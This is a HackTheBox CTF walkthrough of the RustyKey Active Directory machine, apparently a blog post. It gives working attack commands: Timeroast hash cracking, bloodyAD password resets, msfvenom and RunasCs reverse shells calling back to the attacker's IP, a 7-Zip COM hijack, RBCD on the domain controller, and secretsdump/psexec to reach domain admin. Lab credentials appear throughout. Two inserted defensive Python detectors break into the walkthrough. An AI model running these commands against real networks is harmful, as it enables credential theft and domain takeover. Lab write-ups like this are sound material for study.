HackTheBox RustyKey Walkthrough

stillempty
4 min read

This machine runs a cleanup script that keeps undoing your changes, which makes solving it a pain. To start, we are given access to the user account rr.parker with the password 8#t5HE8L!W3A.

Initial Recon

The nmap scan reveals nothing unusual, just the DC and host names.

While using netexec I saw that NTLM authentication was disabled but Kerberos was working.

So I tried a RID brute force after getting a TGT for rr.parker:

impacket-getTGT 'RUSTYKEY.HTB/rr.parker':'8#t5HE8L!W3A'
export KRB5CCNAME=rr.parker.ccache
nxc smb dc.rustykey.htb -k --rid-brute

Seeing so many computer accounts, I thought of doing Timeroast. To know more about Timeroast, read this.

nxc smb 10.10.11.75 -M timeroast

We will use hashcat to crack these hashes. Store them without the RID prefix, like this: $sntp-ms$a0401fc1d9f28b37ffb58e5f78a375fb$1c0111e900000000000a27e14c4f434cec0d0cbe0e792b65e1b8428bffbfcd0aec0d41515a8135f5ec0d41515a816d52. Use the hashcat beta (https://hashcat.net/beta/) and this command to crack them:

./hashcat.bin -m 31300 timeroast_hashes.txt /usr/share/wordlists/rockyou.txt

And finally we got a password. This hash belongs to RID 1125: $sntp-ms$a0401fc1d9f28b37ffb58e5f78a375fb$1c0111e900000000000a27e14c4f434cec0d0cbe0e792b65e1b8428bffbfcd0aec0d41515a8135f5ec0d41515a816d52:Rusty88!, which is IT-COMPUTER3$. Now let's enumerate this account in BloodHound.

IT-COMPUTER3$ has the self-add right on HELPDESK; moreover, HELPDESK has the force-change-password right on these accounts and on the protected objects.

Initial Foothold and user.txt

After enumerating all the accounts, the only one I could access was BB.MORGAN, using evil-winrm. But first add IT-COMPUTER3$ to HELPDESK, change BB.MORGAN's password and remove him from the protected objects (done below by removing the IT group from PROTECTED OBJECTS):

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'Password123@'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'

Then add this configuration:

sudo nano /etc/krb5.conf

[libdefaults]
    default_realm = RUSTYKEY.HTB

# The following krb5.conf variables are only for MIT Kerberos.
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
    rdns = false


# The following libdefaults parameters are only for Heimdal Kerberos.
    fcc-mit-ticketflags = true

[realms]
    RUSTYKEY.HTB = {
        kdc = 10.10.11.75
        admin_server = 10.10.11.75
    }

After this, do the following:

impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN':'Password123@'
export KRB5CCNAME=BB.MORGAN.ccache
evil-winrm -i dc.rustykey.htb -r rustykey.htb

And BOOM!! You have a shell as BB.MORGAN.

For now we have user.txt; let's move on to root.

Privilege Escalation and root.txt

Read internal.pdf, found on bb.morgan's desktop.

Here, note three things:

  • extraction/compression issues -> 7-Zip (can be seen in Program Files)

  • registry changes are allowed for the Support team

  • Support group: ee.reed is a member

So now let's move to the ee.reed account to do the DLL injection and gain access to mm.turner. We will upload RunasCs.exe using evil-winrm, then again add IT-COMPUTER3$ to HELPDESK, force-change ee.reed's password and remove the account's group from the protected objects (the SUPPORT group, in the command below), since the cleanup script reverts everything:

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password EE.REED 'Password123@'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'

In the bb.morgan evil-winrm session run:

nc -lnvp 4444   (on another shell)
.\RunasCs.exe EE.REED 'Password123@' powershell.exe -r <YOUR_IP>:4444

On the other side you will get a shell as ee.reed.

Run this on your own machine to build the DLL for the injection:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=1234 -f dll -o rev.dll

Then upload this rev.dll using the bb.morgan evil-winrm session. Make sure to upload and run all scripts from a folder C:\tmp (create it with mkdir 'c:\tmp'). Then, in the ee.reed shell, we look at where we can do the DLL injection.

For the DLL injection, do this:

nc -lnvp 1234   (on another shell)
$clsid = 'HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}'
Set-ItemProperty "$clsid\InprocServer32" '(default)' 'C:\tmp\rev.dll'
reg add "HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\tmp\rev.dll" /f

Now you will get a shell as mm.turner.
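From the defender's side, the hijack above is visible in the registry: the 7-Zip CLSID's InprocServer32 default no longer points into Program Files. As an added example (not code from the original post), the following Python scans a .reg export of HKLM\SOFTWARE\Classes\CLSID for InprocServer32 defaults outside the usual system directories. The export text is constructed inline; the second CLSID is a made-up placeholder, and only plain quoted defaults are inspected (hex(2) expandable strings are skipped).

```python
import re

# Directories where registered in-process COM servers normally live; a default value
# anywhere else (C:\tmp, user profiles, temp folders) deserves a closer look.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\",
                    "c:\\program files (x86)\\", "%systemroot%\\")

KEY_RE = re.compile(r"^\[HKEY_[^\]]*\\CLSID\\(\{[0-9A-Fa-f-]{36}\})\\InprocServer32\]$", re.I)
DEFAULT_RE = re.compile(r'^@="(.*)"$')   # plain REG_SZ defaults only; hex(2): values are skipped

def unescape_reg(value: str) -> str:
    # .reg files escape a backslash as \\ and a double quote as \"
    return value.replace('\\"', '"').replace("\\\\", "\\")

def suspicious_inproc_servers(reg_text: str):
    """Return [(clsid, dll_path)] for InprocServer32 defaults outside TRUSTED_PREFIXES."""
    findings, clsid = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            clsid = m.group(1).upper()
            continue
        if line.startswith("["):          # any other key ends the InprocServer32 section
            clsid = None
            continue
        m = DEFAULT_RE.match(line)
        if clsid and m:
            path = unescape_reg(m.group(1))
            if not path.lower().startswith(TRUSTED_PREFIXES):
                findings.append((clsid, path))
    return findings

# Constructed sample export: the 7-Zip CLSID from the post pointed at C:\tmp\rev.dll,
# plus a made-up CLSID whose server sits in a normal Program Files path.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32]
@="C:\\tmp\\rev.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Program Files\\7-Zip\\7-zip.dll"
"""

if __name__ == "__main__":
    for clsid, path in suspicious_inproc_servers(SAMPLE_REG):
        print("possible COM hijack:", clsid, "->", path)
```

On a live host the same check can be fed the output of reg export HKLM\SOFTWARE\Classes\CLSID.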

Then type powershell, upload the PowerView.ps1 script into the same directory (C:\tmp) using the bb.morgan shell, and import it with . .\PowerView.ps1

$ComputerSID = New-Object System.Security.Principal.SecurityIdentifier("S-1-5-21-3316070415-896458127-4139322052-1125")
$SD = New-Object System.DirectoryServices.ActiveDirectorySecurity
$SD.SetOwner($ComputerSID)
$SD.SetGroup($ComputerSID)
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($ComputerSID, "GenericAll", "Allow")
$SD.AddAccessRule($ACE)
$BinarySD = $SD.GetSecurityDescriptorBinaryForm()
Set-ADComputer -Identity "DC" -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $BinarySD}

(To check that everything is OK)
Get-ADComputer DC -Properties msDS-AllowedToActOnBehalfOfOtherIdentity

So we are configuring Resource-Based Constrained Delegation (RBCD) on the Domain Controller, and we use it to impersonate users against services on it.
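The Get-ADComputer check above only shows that the attribute is set; what an auditor wants is to know which SIDs the descriptor grants delegation to. As an added example (not code from the original post), this Python decodes the binary self-relative security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity and lists the trustees with GenericAll. The sample descriptor is constructed inline and mirrors the shape the PowerShell above produces, using the RID 1125 SID from the post.

```python
import struct

GENERIC_ALL = 0x10000000          # ActiveDirectoryRights.GenericAll
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004

def parse_sid(buf: bytes, off: int):
    """Decode a binary SID at buf[off]; return (sid_string, bytes_consumed)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count

def rbcd_trustees(sd: bytes):
    """List (sid, access_mask) for each ACCESS_ALLOWED ACE in the DACL of a self-relative SD."""
    rev, _, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _size, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    off, out = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append((parse_sid(sd, off + 8)[0], mask))
        off += ace_size                 # ace_size covers header + SID
    return out

def generic_all_trustees(sd: bytes):
    """SIDs allowed to act on behalf of other identities against this computer;
    for a Domain Controller an auditor expects this list to be empty."""
    return [sid for sid, mask in rbcd_trustees(sd) if mask & GENERIC_ALL]

def _sid_bytes(sid: str) -> bytes:
    rev, auth, *subs = (int(p) for p in sid.split("-")[1:])
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def sample_rbcd_sd(trustee_sid: str) -> bytes:
    """Constructed fixture: owner/group = trustee, one ACE granting it GenericAll."""
    sid = _sid_bytes(trustee_sid)
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), GENERIC_ALL) + sid
    dacl = struct.pack("<BBHHH", 2, 0, 8 + len(ace), 1, 0) + ace
    off_owner, off_group = 20, 20 + len(sid)
    off_dacl = off_group + len(sid)
    hdr = struct.pack("<BBHIIII", 1, 0, 0x8000 | SE_DACL_PRESENT, off_owner, off_group, 0, off_dacl)
    return hdr + sid + sid + dacl

if __name__ == "__main__":
    blob = sample_rbcd_sd("S-1-5-21-3316070415-896458127-4139322052-1125")  # RID 1125 = IT-COMPUTER3$
    print(generic_all_trustees(blob))
```

On a real domain, feed rbcd_trustees the raw bytes read from the attribute via LDAP for every computer object and alert on any non-empty result for a DC.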

Make sure you look at this.

Now there are two ways to get root.

Root 1 (DCSync attack)

impacket-getTGT 'RUSTYKEY.HTB/IT-COMPUTER3$':'Rusty88!'
export KRB5CCNAME=IT-COMPUTER3$.ccache
impacket-getST  -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
impacket-secretsdump -k -no-pass rustykey.htb/backupadmin@dc.rustykey.htb

Then do:

impacket-getTGT 'RUSTYKEY.HTB/administrator':'Rustyrc4key#!'
export KRB5CCNAME=administrator.ccache
evil-winrm -i dc.rustykey.htb -r rustykey.htb

Root 2 (psexec)

impacket-getTGT 'RUSTYKEY.HTB/IT-COMPUTER3$':'Rusty88!'
export KRB5CCNAME=IT-COMPUTER3$.ccache
impacket-getST  -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

Then use psexec to get an administrator shell:

impacket-psexec -k -no-pass rustykey.htb/backupadmin@dc.rustykey.htb

Both ways give us root.txt. Moreover, if you face any authentication issues, try repeating the bloodyAD step (or whichever step is failing), since the cleanup script runs every time.

To know more about COM hijacking, read this.

Thanks for reading the walkthrough. Hope you liked it! Do leave a comment for feedback or queries!
